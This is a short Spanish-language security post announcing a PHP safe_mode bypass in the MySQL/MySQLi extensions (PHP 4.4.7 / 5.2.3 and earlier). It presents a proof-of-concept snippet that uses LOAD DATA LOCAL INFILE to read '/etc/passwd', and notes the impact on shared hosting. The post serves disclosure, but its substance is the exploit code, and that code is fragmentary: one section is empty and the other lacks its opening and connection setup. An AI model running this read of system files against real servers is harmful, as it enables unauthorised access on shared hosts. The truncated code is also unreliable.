| PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability |
|
 Una vulnerabilidad existente en MySQL del PHP y MySQL extensiones que puede ser usada evitar la restricción de seguridad(valor) safe_mode del PHP.
MySQL code:
-----------------------------------------------------------
MySQLi:
options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler("r");
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$m->close();
?>
-----------------------------------------------------------
Impacto:
Esta vulnerabilidad podría tener el impacto principal sobre sistemas de recepción compartidos.
|
|
| Enviado el Martes, 11 septiembre a las 21:17:38 por The_Legend |
|
| |
| Login |
| ¿Todavía no tienes una cuenta? Puedes crearte una. Como usuario registrado tendrás ventajas como seleccionar la apariencia de la página, configurar los comentarios y enviar los comentarios con tu nombre. |
|
| Enlaces Relacionados |
|
| Votos del Artículo |
Puntuación Promedio: 0
votos: 0
|
|
| Opciones |
|
|
